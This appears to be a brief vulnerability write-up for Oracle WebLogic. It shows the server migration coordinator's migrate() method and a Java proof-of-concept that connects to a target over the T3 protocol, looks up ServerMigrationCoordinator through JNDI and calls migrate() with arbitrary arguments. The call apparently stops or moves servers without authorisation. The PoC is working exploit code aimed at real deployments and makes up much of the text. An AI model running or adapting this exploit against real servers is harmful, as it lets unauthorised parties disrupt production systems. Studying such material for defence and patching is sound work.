Vulnerable code
@Override
public void migrate(final String serverName, final String sourceMachine, final String destinationMachine, final boolean sourceDown, final boolean destinationDown) throws ServerMigrationException {
ServerMigrationTask task = this.taskMap.get(serverName);
if (task == null) {
task = new ServerMigrationTask(serverName, destinationMachine);
if (MigrationDebugLogger.isDebugEnabled()) {
MigrationDebugLogger.debug(serverName + " New Migration Task " + task);
}
this.taskMap.put(serverName, task);
try {
this.stopServer(sourceDown, task);
this.startServer(destinationDown, task);
}
finally {
this.taskMap.remove(serverName);
}
return;
}
throw new ServerMigrationException("Migration operation in progress", null);
}
PoC
static boolean PoC(String PS_SERVER_IP, Server PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException {
Properties p = new Properties();
p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
p.put(Context.PROVIDER_URL, "t3://"+PS_SERVER_IP+":"+PS_SERVER_PORT);
Context ctx = new InitialContext(p);
Object obj = ctx.lookup("weblogic/cluster/singleton/ServerMigrationCoordinator");
Object o = PortableRemoteObject.narrow(obj, ServerMigrationCoordinator.class);
ServerMigrationCoordinator h = (ServerMigrationCoordinator) o;
h.migrate("PIA","а","any_data_or_ip", true, true);
return false;
}